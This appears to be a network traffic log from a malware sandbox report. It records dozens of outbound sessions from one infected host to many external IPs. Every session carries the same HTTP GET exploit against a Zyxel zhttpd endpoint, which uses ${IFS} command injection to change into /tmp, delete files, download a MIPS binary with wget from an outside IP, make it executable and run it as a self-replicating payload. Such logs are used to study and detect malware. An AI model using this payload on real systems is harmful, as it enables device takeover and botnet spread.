                                                Jan 12, 2024 18:24:26.609405041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1967192.168.2.1347648160.209.9.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.609450102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1968192.168.2.1359032122.187.246.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.609488010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1969192.168.2.135777472.175.60.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.609518051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1970192.168.2.1347970108.219.80.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.609540939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1971192.168.2.133365086.66.246.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.609601974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1972192.168.2.1334362106.52.180.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.609621048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1973192.168.2.1351336154.253.142.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.609663010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1974192.168.2.134186074.113.149.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.609707117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1975192.168.2.1340490158.87.10.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.609743118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1976192.168.2.135248075.168.60.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.609790087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1977192.168.2.1343818119.172.28.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.609838009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1978192.168.2.134135488.183.173.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.609890938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1979192.168.2.1355594163.252.32.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.609939098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1980192.168.2.13446544.75.144.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.609982014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1981192.168.2.134190070.139.219.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610032082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1982192.168.2.1339312180.119.245.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610074997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1983192.168.2.1342100222.37.164.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610114098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1984192.168.2.1335552196.35.202.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610127926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1985192.168.2.1337172176.113.67.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610177994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1986192.168.2.1355410207.216.10.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610213041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1987192.168.2.134116288.209.79.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610248089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1988192.168.2.1339844138.25.216.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610274076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1989192.168.2.135769069.29.43.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610332966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1990192.168.2.1344244182.81.236.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610372066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1991192.168.2.1348362123.4.207.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610394001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1992192.168.2.1336664137.40.129.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610444069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1993192.168.2.133670037.118.201.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610487938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1994192.168.2.133758613.185.77.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610523939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1995192.168.2.1349794141.113.4.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610564947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1996192.168.2.1339522187.171.182.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610622883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1997192.168.2.135592289.245.174.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610666037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1998192.168.2.1347994138.127.246.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610707045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1999192.168.2.135353098.46.86.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610730886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2000192.168.2.1351744165.169.126.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610761881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2001192.168.2.1353968172.212.145.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610805035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2002192.168.2.1338848200.38.14.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610842943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2003192.168.2.135299493.248.133.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610874891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2004192.168.2.1360362197.64.88.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610917091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2005192.168.2.1351864207.21.26.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.610970020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2006192.168.2.135132075.36.185.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.611012936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2007192.168.2.1353970163.22.19.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.611062050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2008192.168.2.1360020179.96.11.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.611097097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2009192.168.2.1342526172.238.11.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.611121893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2010192.168.2.1352488102.66.148.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.611170053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2011192.168.2.1338628203.21.247.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.611212969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2012192.168.2.133704269.61.240.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.611268997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2013192.168.2.134347299.22.32.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.611290932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2014192.168.2.1347426178.12.141.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.611339092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2015192.168.2.1336658124.69.20.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.611385107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2016192.168.2.135662879.227.146.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.611414909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2017192.168.2.1352334219.28.101.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.611440897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2018192.168.2.135487267.190.22.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.611495018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2019192.168.2.135583898.255.133.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.611562014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2020192.168.2.133700288.66.80.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.611573935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2021192.168.2.134869291.220.205.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.611629963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2022192.168.2.1334696145.253.49.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.611663103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2023192.168.2.1339840152.63.102.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.611696959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2024192.168.2.1360004133.49.46.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.611751080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2025192.168.2.135726442.199.62.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.611787081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2026192.168.2.1339664147.154.235.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.611840963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2027192.168.2.1334620130.16.169.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.611877918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2028192.168.2.133415273.211.114.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.611912012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2029192.168.2.133764098.81.175.231443
                                                TimestampBytes transferredDirectionData
